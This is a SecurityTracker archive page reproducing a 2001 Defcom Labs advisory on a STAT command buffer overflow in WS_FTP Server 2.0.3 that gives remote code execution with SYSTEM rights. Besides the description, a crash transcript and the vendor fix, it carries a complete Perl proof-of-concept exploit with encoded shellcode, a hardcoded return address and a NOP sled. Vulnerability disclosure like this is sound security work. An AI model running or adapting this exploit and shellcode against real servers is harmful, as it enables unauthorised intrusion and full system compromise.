SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   WS_FTP Vendors:   Ipswitch
WS_FTP Server Buffer Overflow in STAT Command Lets Remote Users Execute Arbitrary Code with System Level Privileges
SecurityTracker Alert ID:  1002699
SecurityTracker URL:  http://securitytracker.com/id/1002699
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 5 2001
Impact:   Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.3, possibly earlier versions
Description:   Defcom Labs warned of a buffer overflow in WS_FTP server. Remote users can run code on the server with System privileges.

It is reported that the parsing code for the STAT command contains a buffer overflow. A remote user can send a STAT command followed by an argument greater than 479 (475 bytes + new return address) bytes to trigger the vulnerability and overwrite the EIP.

A demonstration exploit transcript and a demonstration exploit script is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the server with System level privileges.
Solution:   The vendor has released a fixed version (2.0.4), available at the Vendor URL.
Vendor URL:  www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  def-2001-31


--------------20067D626DDC99B39503357C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

======================================================================
                  Defcom Labs Advisory def-2001-31

                WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  The parsing code for the STAT command suffers from a buffer
  overflow. By sending a STAT command followed by an argument greater
  than 479 (475 bytes + new return address) bytes, a buffer will
  overflow and the EIP will be overwritten. The overflow is dependant
  on the size of the name of the server because the argument, the
  servername and some more information is wsprint'ed together in the
  buffer. A proof-of-concept exploit is attached to the advisory.

  C:\tools\web>nc localhost 21
  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  220-Wed Aug 08 19:57:40 2001
  220-30 days remaining on evaluation.
  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAA

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
  SetFolder = C:\program\iFtpSvc\helig
  SetFolder = C:\program\iFtpSvc\helig\public
  SetFolder = C:/program/iFtpSvc/helig
  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
  (A1)
  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
  esi=0067c280 edi=00130178
  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
  41414141 ??               ???

---------------------------=[Workaround]=-----------------------------
Download new version(2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 8th of
August, 2001. Patch is released.

======================================================================
            This release was brought to you by Defcom Labs

          labs@defcom.com             http://labs.defcom.com
======================================================================
--------------20067D626DDC99B39503357C
Content-Type: application/x-perl;
 name="ws_ftp2.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="ws_ftp2.pl"

#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By andreas@defcom.com (C)2001
#
# 
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing,
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, Im only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependant on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack, it just ends with CreateFile overwriting stuff.
#
# Im using a "jump esp" in shlwapi.dll(0x70beed87) as the return address,
# change this if it does not work on your system.
#
#########################################################################
$login="ftp";	#username
$pass="ftp";	#password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
	print "WS_FTP server 2.0.3 STAT proof-of-concept exploit\n";
	print "It creates a file named defcom.iyd in the c-root\n";
	print "(C)2001 andreas\@defcom.com\n";
   	print "Usage: $0 <host>\n";
	print "Example: $0 127.0.0.1\n";
	exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain
recv(SOCK,$reply,1024,0);
@split1 = split(/\ /,$reply);
@split2 = split(/\-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,"\.");
if ($pos == -1) { print "Error: Domain has to be atleast two characters"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be atleast two characters"; exit; }
###########################################################################################

sleep(1);
$msg = "user $login\n"; 
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit="\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xc2\x83\xc0\x1a\xeb\x02\xeb\x80\x33";
$sploit = $sploit . "\xc9\x66\xb9\xd6\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\x12";
$sploit = $sploit . "\x7b\x1a\x75\x92\x12\x75\xcb\xf1\x99\x63\x99\x99\xf1\xd9\x99\x99\x99";
$sploit = $sploit . "\x27\x45\x8d\xdc\x99\x66\x8f\xc3\x9c\x99\x63\x99\x99\x12\x79\x12\x75";
$sploit = $sploit . "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a";
$sploit = $sploit . "\x5b\xfb\xcb\x27\xbd\x8c\xdc\x99\x66\x8f\xaa\x59\xc9\x27\x89\x8f\xdc";
$sploit = $sploit . "\x99\x66\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "stat " . "\x90" x (480-length($sploit)-length($servername)) . $sploit . "\x87\xed\xbe\x70" . "\x90" x 16 . "\xeb\x81" . "\r\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;
--------------20067D626DDC99B39503357C--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC